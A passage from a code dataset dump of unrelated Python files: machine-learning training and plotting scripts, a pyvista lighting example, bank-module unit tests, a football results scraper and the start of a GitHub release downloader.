Classifier Result.txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result.txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0016, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00063, betas=(0.9, 0.999), eps=1e-2)\n print('Start LSTM training...')\n train_loss_LSTM, train_acc_LSTM, test_loss_LSTM, test_acc_LSTM,laying_acc_LSTM,\\\n sitting_acc_LSTM, standing_acc_LSTM,walking_acc_LSTM,walkingdown_acc_LSTM,\\\n walkingup_acc_LSTM, test_prediction_LSTM = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader, train_y_loader, test_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished LSTM Training...')\n\n\n NUM_FEATURE = import_feature\n # Importance MLP Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 94% - 95.5%\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result(fc).txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result(fc).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0013, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0008, betas=(0.9, 0.999))\n print('Start Importance Feature Selection MLP training...')\n train_loss_MLP_fc, train_acc_MLP_fc, test_loss_MLP_fc, test_acc_MLP_fc,\\\n laying_acc_MLP_fc, sitting_acc_MLP_fc, standing_acc_MLP_fc, walking_acc_MLP_fc, walkingdown_acc_MLP_fc,\\\n walkingup_acc_MLP_fc, test_prediction_MLP_fc = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_import_x_loader, train_y_loader, test_import_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished Importance Feature Selection MLP Training...')\n\n # Importance LSTM Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 94% - 95.5%.\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result(fc).txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result(fc).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0013, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0005, betas=(0.9, 0.999), eps=1e-6)\n print('Start Importance Feature Selection LSTM training...')\n train_loss_LSTM_fc, train_acc_LSTM_fc, test_loss_LSTM_fc, test_acc_LSTM_fc,laying_acc_LSTM_fc,\\\n sitting_acc_LSTM_fc, standing_acc_LSTM_fc, walking_acc_LSTM_fc, walkingdown_acc_LSTM_fc,\\\n walkingup_acc_LSTM_fc, test_prediction_LSTM_fc = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_import_x_loader, train_y_loader, test_import_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished Importance Feature Selection LSTM Training...')\n\n NUM_FEATURE = 400\n # MIFS MLP Classifier, 400 features. train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 91% - 95%.\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result(mifs).txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result(mifs).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0015, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0005, betas=(0.9, 0.999), eps=1e-1)\n print('Start MIFS MLP training...')\n train_loss_MLP_mifs, train_acc_MLP_mifs, test_loss_MLP_mifs, test_acc_MLP_mifs,\\\n laying_acc_MLP_mifs, sitting_acc_MLP_mifs, standing_acc_MLP_mifs, walking_acc_MLP_mifs, walkingdown_acc_MLP_mifs,\\\n walkingup_acc_MLP_mifs, test_prediction_MLP_mifs = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_mifs, train_y_loader, test_x_loader_mifs, test_y_loader)\n file1.close()\n file2.close()\n print('Finished MIFS MLP Training...')\n\n # MIFS LSTM Classifier, 400 features. train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 91% - 95%.\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result(mifs).txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result(mifs).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0015, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00075, betas=(0.9, 0.999), eps=1e-1)\n print('Start MIFS LSTM training...')\n train_loss_LSTM_mifs, train_acc_LSTM_mifs, test_loss_LSTM_mifs, test_acc_LSTM_mifs, laying_acc_LSTM_mifs,\\\n sitting_acc_LSTM_mifs, standing_acc_LSTM_mifs, walking_acc_LSTM_mifs, walkingdown_acc_LSTM_mifs,\\\n walkingup_acc_LSTM_mifs, test_prediction_LSTM_mifs = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_mifs, train_y_loader, test_x_loader_mifs, test_y_loader)\n file1.close()\n file2.close()\n print('Finished MIFS LSTM Training...')\n\n # F-score MLP Classifier, 400 features. train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 90% - 94%.\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result(fscore).txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result(fscore).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.002, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0005, betas=(0.9, 0.999), eps=1e-1)\n print('Start F-score MLP training...')\n train_loss_MLP_fscore, train_acc_MLP_fscore, test_loss_MLP_fscore, test_acc_MLP_fscore,\\\n laying_acc_MLP_fscore, sitting_acc_MLP_fscore, standing_acc_MLP_fscore, walking_acc_MLP_fscore, walkingdown_acc_MLP_fscore,\\\n walkingup_acc_MLP_fscore, test_prediction_MLP_fscore = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_fscore, train_y_loader, test_x_loader_fscore, test_y_loader)\n file1.close()\n file2.close()\n print('Finished F-score MLP Training...')\n\n # MIFS LSTM Classifier, 400 features. train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 91% - 95%.\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result(fscore).txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result(fscore).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.002, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00075, betas=(0.9, 0.999), eps=1e-1)\n print('Start F-score LSTM training...')\n train_loss_LSTM_fscore, train_acc_LSTM_fscore, test_loss_LSTM_fscore, test_acc_LSTM_fscore, laying_acc_LSTM_fscore,\\\n sitting_acc_LSTM_fscore, standing_acc_LSTM_fscore, walking_acc_LSTM_fscore, walkingdown_acc_LSTM_fscore,\\\n walkingup_acc_LSTM_fscore, test_prediction_LSTM_fscore = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_fscore, train_y_loader, test_x_loader_fscore, test_y_loader)\n file1.close()\n file2.close()\n print('Finished F-score LSTM Training...')\n\n # plot figure\n print('Start Ploting...')\n file = open(\"index for best accuracy.txt\", 'w')\n file.write(\"index selected in MLP and LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_LSTM,\n test_loss_LSTM, train_acc_MLP, test_acc_MLP, train_acc_LSTM, test_acc_LSTM,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_LSTM, sitting_acc_LSTM,\n standing_acc_LSTM, walking_acc_LSTM, walkingdown_acc_LSTM, walkingup_acc_LSTM, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'Train LSTM', 'Test LSTM'], ['MLP', 'LSTM'])\n file.write(\"index selected in MLP and importance MLP:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_MLP_fc,\n test_loss_MLP_fc, train_acc_MLP, test_acc_MLP, train_acc_MLP_fc, test_acc_MLP_fc,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_MLP_fc, sitting_acc_MLP_fc,\n standing_acc_MLP_fc, walking_acc_MLP_fc, walkingdown_acc_MLP_fc, walkingup_acc_MLP_fc, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'Importance Train MLP', 'Importance Test MLP'], ['MLP', 'Importance MLP'])\n file.write(\"index selected in LSTM and importance LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_LSTM, test_loss_LSTM, train_loss_LSTM_fc,\n test_loss_LSTM_fc, train_acc_LSTM, test_acc_LSTM, train_acc_LSTM_fc, test_acc_LSTM_fc,\n laying_acc_LSTM, sitting_acc_LSTM, standing_acc_LSTM, walking_acc_LSTM,\n walkingdown_acc_LSTM, walkingup_acc_LSTM, laying_acc_LSTM_fc, sitting_acc_LSTM_fc,\n standing_acc_LSTM_fc, walking_acc_LSTM_fc, walkingdown_acc_LSTM_fc, walkingup_acc_LSTM_fc, file,\n ['Loss', 'Accuracy'], ['Train LSTM', 'Test LSTM', 'Importance Train LSTM', 'Importance Test LSTM'], ['LSTM', 'Importance LSTM'])\n figurePlot(MAX_EPOCH, classes, train_loss_MLP_fc, test_loss_MLP_fc, train_loss_LSTM_fc,\n test_loss_LSTM_fc, train_acc_MLP_fc, test_acc_MLP_fc, train_acc_LSTM_fc, test_acc_LSTM_fc,\n laying_acc_MLP_fc, sitting_acc_MLP_fc, standing_acc_MLP_fc, walking_acc_MLP_fc,\n walkingdown_acc_MLP_fc, walkingup_acc_MLP_fc, laying_acc_LSTM_fc, sitting_acc_LSTM_fc,\n standing_acc_LSTM_fc, walking_acc_LSTM_fc, walkingdown_acc_LSTM_fc, walkingup_acc_LSTM_fc, file,\n ['Loss', 'Accuracy'], ['Importance Train MLP', 'Importance Test MLP', 'Importance Train LSTM', 'Importance Test LSTM'],\n ['Importance MLP', 'Importance LSTM'])\n file.write(\"index selected in MLP and MIFS MLP:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_MLP_mifs,\n test_loss_MLP_mifs, train_acc_MLP, test_acc_MLP, train_acc_MLP_mifs, test_acc_MLP_mifs,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_MLP_mifs, sitting_acc_MLP_mifs,\n standing_acc_MLP_mifs, walking_acc_MLP_mifs, walkingdown_acc_MLP_mifs, walkingup_acc_MLP_mifs, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'MIFS Train MLP', 'MIFS Test MLP'], ['MLP', 'MIFS MLP'])\n file.write(\"index selected in LSTM and MIFS LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_LSTM, test_loss_LSTM, train_loss_LSTM_mifs,\n test_loss_LSTM_mifs, train_acc_LSTM, test_acc_LSTM, train_acc_LSTM_mifs, test_acc_LSTM_mifs,\n laying_acc_LSTM, sitting_acc_LSTM, standing_acc_LSTM, walking_acc_LSTM,\n walkingdown_acc_LSTM, walkingup_acc_LSTM, laying_acc_LSTM_mifs, sitting_acc_LSTM_mifs,\n standing_acc_LSTM_mifs, walking_acc_LSTM_mifs, walkingdown_acc_LSTM_mifs, walkingup_acc_LSTM_mifs, file,\n ['Loss', 'Accuracy'], ['Train LSTM', 'Test LSTM', 'MIFS Train LSTM', 'MIFS Test LSTM'], ['LSTM', 'MIFS LSTM'])\n file.write(\"index selected in MLP and F-score MLP:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_MLP_fscore,\n test_loss_MLP_fscore, train_acc_MLP, test_acc_MLP, train_acc_MLP_fscore, test_acc_MLP_fscore,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_MLP_fscore, sitting_acc_MLP_fscore,\n standing_acc_MLP_fscore, walking_acc_MLP_fscore, walkingdown_acc_MLP_fscore, walkingup_acc_MLP_fscore, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'F-score Train MLP', 'F-score Test MLP'], ['MLP', 'F-score MLP'])\n file.write(\"index selected in LSTM and F-score LSTM\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_LSTM, test_loss_LSTM, train_loss_LSTM_fscore,\n test_loss_LSTM_fscore, train_acc_LSTM, test_acc_LSTM, train_acc_LSTM_fscore, test_acc_LSTM_fscore,\n laying_acc_LSTM, sitting_acc_LSTM, standing_acc_LSTM, walking_acc_LSTM,\n walkingdown_acc_LSTM, walkingup_acc_LSTM, laying_acc_LSTM_fscore, sitting_acc_LSTM_fscore,\n standing_acc_LSTM_fscore, walking_acc_LSTM_fscore, walkingdown_acc_LSTM_fscore, walkingup_acc_LSTM_fscore, file,\n ['Loss', 'Accuracy'], ['Train LSTM', 'Test LSTM', 'F-score Train LSTM', 'F-score Test LSTM'], ['LSTM', 'F-score LSTM'])\n file.close()\n print('Finished Ploting...')\n\n # plot confusion matrix\n print('Start confusion_matrix...')\n cfs1 = confusion_matrix(test_y, np.asarray(test_prediction_MLP))\n cfs2 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM))\n cfs3 = confusion_matrix(test_y, np.asarray(test_prediction_MLP_fc))\n cfs4 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM_fc))\n cfs5 = confusion_matrix(test_y, np.asarray(test_prediction_MLP_mifs))\n cfs6 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM_mifs))\n cfs7 = confusion_matrix(test_y, np.asarray(test_prediction_MLP_fscore))\n cfs8 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM_fscore))\n PlotConfusionMatrix(cfs1, classes = classes, title = \"MLP Confusion Matrix without Feature Selection\")\n PlotConfusionMatrix(cfs2, classes = classes, title = \"LSTM Confusion Matrix Without Feature Selection\")\n PlotConfusionMatrix(cfs3, classes = classes, title = \"MLP Confusion Matrix With Importance Feature Selection\")\n PlotConfusionMatrix(cfs4, classes = classes, title = \"LSTM Confusion Matrix With Importance Feature Selection\")\n PlotConfusionMatrix(cfs5, classes = classes, title = \"MLP Confusion Matrix With MIFS Feature Selection\")\n PlotConfusionMatrix(cfs6, classes = classes, title = \"LSTM Confusion Matrix With MIFS Feature Selection\")\n PlotConfusionMatrix(cfs7, classes = classes, title = \"MLP Confusion Matrix With F-score Feature Selection\")\n PlotConfusionMatrix(cfs8, classes = classes, title = \"LSTM Confusion Matrix With F-score Feature Selection\")\n print('Finished confusion_matrix...')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Project/human-activity-recognition-with-smartphones/CS535project/cs535finalproject.py","file_name":"cs535finalproject.py","file_ext":"py","file_size_in_byte":38649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379454365","text":"# Plot three cubes lit by two lights with different attenuation\n# profiles. The blue light has slower linear attenuation, the\n# green one has quadratic attenuation that makes it decay\n# faster. Note that there are no shadow effects included so each\n# box gets lit by both lights.\n#\nimport pyvista as pv\nplotter = pv.Plotter(lighting='none')\nfor offset in 1, 2.5, 4:\n _ = plotter.add_mesh(\n pv.Cube(center=(offset, offset, 0)), color='white'\n )\ncolors = ['b', 'g']\nall_attenuations = [(0, 0.1, 0), (0, 0, 0.1)]\ncenters = [(0, 1, 0), (1, 0, 0)]\nfor color, attenuation_constants, center in zip(\n colors, all_attenuations, centers\n):\n light = pv.Light(position=center, color=color)\n light.focal_point = (1 + center[0], 1 + center[1], 0)\n light.cone_angle = 90\n light.positional = True\n light.attenuation_values = attenuation_constants\n plotter.add_light(light)\nplotter.view_vector((-1, -1, 1))\nplotter.show()\n","sub_path":"version/0.39/api/core/_autosummary/pyvista-Light-attenuation_values-1.py","file_name":"pyvista-Light-attenuation_values-1.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160977208","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.4'\n# jupytext_version: 1.2.3\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nimport numpy as np\nimport os\n\nnp.random.seed(42)\n\n# %matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Ignore useless warnings\nimport warnings\nwarnings.filterwarnings(action=\"ignore\", message=\"^internal gelsd\")\n\n# +\nimport pandas as pd\npd.set_option('display.max_rows', 30)\n\nX_test = pd.read_csv(\"test_LTFS.csv\")\ntrain_df = pd.read_csv(\"train_LTFS.csv\")\n# -\n\ntrain_df.head()\n\n\ndef missing_values_table(df):\n # Total missing values\n mis_val = df.isnull().sum()\n \n # Percentage of missing values\n mis_val_percent = 100 * df.isnull().sum() / len(df)\n \n # Make a table with the results\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\n \n # Rename the columns\n mis_val_table_ren_columns = mis_val_table.rename(\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\n \n # Sort the table by percentage of missing descending\n mis_val_table_ren_columns = mis_val_table_ren_columns[\n mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\n '% of Total Values', ascending=False).round(1)\n \n # Print some summary information\n print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\" \n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\n \" columns that have missing values.\")\n \n # Return the dataframe with missing information\n return mis_val_table_ren_columns\n\n\nmissing_values_table(train_df)\n\ntrain_df.columns\n\ntrain_df['loan_default'].value_counts()\n\ny_train = train_df['loan_default']\n\nX_train = train_df.drop('loan_default', axis =1)\nX_train = train_df.drop('Date.of.Birth', axis = 1)\n\n\ndef _get_categorical_features(df):\n feats = [col for col in list(df.columns) if df[col].dtype == 'object']\n return feats\n\n\ndef _get_numerical_features(df, cat_list):\n feats = [col for col in list(df.columns) if col not in cat_list]\n return feats\n\n\ncat_feats = _get_categorical_features(X_train)\n\nnum_feats = _get_numerical_features(X_train, cat_feats)\n\ncat_feats\n\n\n\n\n\n\n\n\n\n# +\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import OneHotEncoder\n\nclass selector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self,X):\n return X[self.attribute_names].values\n \n\n\nnum_pipeline = Pipeline([\n ('selector', selector(num_feats)),\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('std_scaler', StandardScaler()),\n ])\n\ncat_pipeline = Pipeline([\n ('selector', selector(cat_feats)),\n ('imputer', SimpleImputer(strategy=\"most_frequent\")),\n ('cat_encoder', OneHotEncoder(sparse=False)),\n])\n\n# +\nfrom sklearn.pipeline import FeatureUnion\n\nfull_pipeline = FeatureUnion(transformer_list=[\n (\"num_pipeline\", num_pipeline),\n (\"cat_pipeline\", cat_pipeline),\n ])\n\n# +\nX_train_processed = full_pipeline.fit_transform(X_train)\nX_train_processed = pd.DataFrame(X_train_processed)\n\n\n\n\n# -\n\n\n\n\n\n# +\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nfrom matplotlib.pyplot import figure\nfigure(num=None, figsize=(15, 8), dpi=80, facecolor='w', edgecolor='k')\n\ntsne = TSNE(n_components=2, random_state=0)\ntransformed_data = tsne.fit_transform(X_train_processed[:500])\nk = np.array(transformed_data)\n\ncolors = ['red', 'green']\n\nplt.scatter(k[:, 0], k[:, 1], c=y_train[:500], zorder=10, s=2, cmap=matplotlib.colors.ListedColormap(colors))\n# -\n\nfrom sklearn.decomposition import PCA \npca = PCA(n_components = 2)\nX2D = pca.fit_transform(X_train_processed)\n\npca.explained_variance_ratio_\n\nfigure(num=None, figsize=(15, 8), dpi=80, facecolor='w', edgecolor='k')\ncolors = ['red', 'green']\nplt.scatter(X2D[:, 0], X2D[:, 1], c=y_train, zorder=10, s=2, cmap=matplotlib.colors.ListedColormap(colors))\n\npca = PCA()\npca.fit(X_train_processed)\ncumsum = np.cumsum(pca.explained_variance_ratio_) \nd = np.argmax(cumsum >= 0.95) + 1\n\nd\n\npca = PCA(n_components=0.95) \nX_reduced = pca.fit_transform(X_train_processed)\n\nX_train_processed\n\nX_train.to_csv(r'X_train.csv')\ny_train.to_csv(r'y_train.csv')\nX_train_processed.to_csv(r'X_train_processed.csv')\n\n\n","sub_path":"00_TSNA_PCA_plot.py","file_name":"00_TSNA_PCA_plot.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"40188510","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom pa.pa.bank import Banks\n\n\nclass TestConfig:\n DB = 'memory'\n\n\nclass TestBank(TestCase):\n\n @patch('pa.db.bank.BankDB.add')\n def test_add_bank(self, mock_add):\n banks = Banks(TestConfig)\n banks.add({\n 'bank_name': 'aa',\n 'bank_branch': 'aa',\n 'branch_address': 'a\\r\\nb\\r\\nc\\r\\n',\n 'timings': '',\n }, for_user='u1')\n\n mock_add.assert_called_with({\n 'bank_name': 'aa',\n 'bank_branch': 'aa',\n 'branch_address': 'a\\r\\nb\\r\\nc\\r\\n',\n 'timings': '',\n 'username': 'u1',\n })\n\n @patch('pa.db.bank.BankDB.get_all_banks')\n def test_get_all_banks(self, mock_get_all_banks):\n\n mock_get_all_banks.return_value = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b2', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b3', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n ]\n expected_all_banks = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': ''},\n {'bank_name': 'b2', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': ''},\n {'bank_name': 'b3', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': ''},\n ]\n\n banks = Banks(TestConfig)\n all_banks = banks.get_all_banks(for_user='u1')\n self.assertEqual(expected_all_banks, all_banks)\n\n @patch('pa.db.bank.BankDB.get_all_banks')\n def test_get_all_bank_branch_names(self, mock_get_all_banks):\n\n mock_get_all_banks.return_value = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b1', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b2', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n ]\n expected_all_bank_branch_names = {\n 'b1': ['br1', 'br2'],\n 'b2': ['br3'],\n }\n\n banks = Banks(TestConfig)\n all_bank_branch_names = banks.get_all_bank_branch_names(for_user='u1')\n self.assertEqual(expected_all_bank_branch_names, all_bank_branch_names)\n\n @patch('pa.db.bank.BankDB.get_all_banks')\n def test_get_all_branches_of_a_bank(self, mock_get_all_banks):\n mock_get_all_banks.return_value = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b1', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b1', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b2', 'bank_branch': 'br4', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n ]\n banks = Banks(TestConfig)\n branch_names = banks.get_all_branches_of_a_bank(bank_name='b1', for_user='u1')\n self.assertEqual(['br1', 'br2', 'br3'], branch_names)\n\n @patch('pa.db.bank.BankDB.delete_bank_branch')\n def test_delete_bank_branch(self, mock_delete_bank_branch):\n banks = Banks(TestConfig)\n banks.delete_bank_branch(bank_name='b1', bank_branch='br1', username='u1')\n mock_delete_bank_branch.assert_called_with(bank_name='b1', bank_branch='br1', username='u1')\n","sub_path":"test/pa/test_bank.py","file_name":"test_bank.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"372781511","text":"import string\r\n# file = open('channel//90052.txt')\r\n# contents = file.read()\r\n\r\n\r\ndef find_next_nothing(nothing_number):\r\n file = open(f'channel//{nothing_number}.txt')\r\n contents = file.read()\r\n nothing = \"\".join([character for character in contents if character not in string.printable[10::] + \" \"])\r\n print(nothing)\r\n return nothing\r\n\r\n\r\ntemp = find_next_nothing(90052)\r\nwhile True:\r\n temp = find_next_nothing(temp)\r\n print(temp)\r\n","sub_path":"reddit_daily/python_challenge.py","file_name":"python_challenge.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"354040052","text":"from lxml import html\nfrom requests import get\n\n\ndef reqKickerMatchday(_league, _season, _matchday):\n \"\"\"Request the appropriate html from kicker.de and return tree:\"\"\"\n\n URL = 'http://www.kicker.de/news/fussball/{0}/{1}/{2}/0/spieltag.html'\n\n if _league == 1:\n leagueURL = 'bundesliga/spieltag/1-bundesliga'\n elif _league == 2:\n leagueURL = '2bundesliga/spieltag/2-bundesliga'\n elif _league == 3:\n leagueURL = '/3liga/spieltag/3-liga'\n else:\n raise ValueError(\"1&2 Bundesliga + 3 Liga support only atm.\")\n\n page = get(URL.format(leagueURL, _season, str(_matchday)))\n tree = html.fromstring(page.content)\n return tree\n\n\ndef reqKickerMatches(_tree, _nGames):\n links = _tree.xpath(\"//a/@href\")\n matchdaylinks = []\n matchtrees = []\n for link in links:\n if \"spielanalyse\" in link:\n matchdaylinks.append(link)\n for m in range(_nGames):\n page = get('http://www.kicker.de/'+matchdaylinks[m])\n matchtrees.append(html.fromstring(page.content))\n return matchtrees\n\n\ndef genMatchID(_league, _season, _matchday, _game):\n ID = ''\n ID += str(_league)\n ID += _season[2:4]+_season[5:7]\n if _matchday < 10:\n ID += '0' + str(_matchday)\n else:\n ID += str(_matchday)\n if _game < 10:\n ID += '0' + str(_game)\n else:\n ID += str(_game)\n return ID\n\n\ndef genGoalID(_league, _season, _matchday, _game, _goal):\n if _goal < 10:\n gid = genMatchID(_league, _season, _matchday, _game) + '0' + str(_goal)\n else:\n gid = genMatchID(_league, _season, _matchday, _game) + str(_goal)\n return gid\n\nif __name__ == \"__main__\":\n print(genGoalID(1, '2014-15', 1, 1, 1))\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"52128927","text":"#! /usr/bin/python\n\nimport os\nimport sys\nimport json\nimport zipfile\nfrom urllib.request import urlopen, urlretrieve\n\ndef getFromAPI(user, repo):\n\ttry:\n\t\treturn json.loads(urlopen(\"https://api.github.com/repos/%(user)s/%(repo)s/releases/latest\" % locals()).read().decode('utf-8'))\n\texcept Exception as e:\n\t\traise e\n\ndef downloadFile(url, name):\n\ttry:\n\t\t# Needs fixing =). Over 100%??\n\t\tdef dlProgress(count, blockSize, totalSize):\n\t\t\ti = int((count * totalSize) / 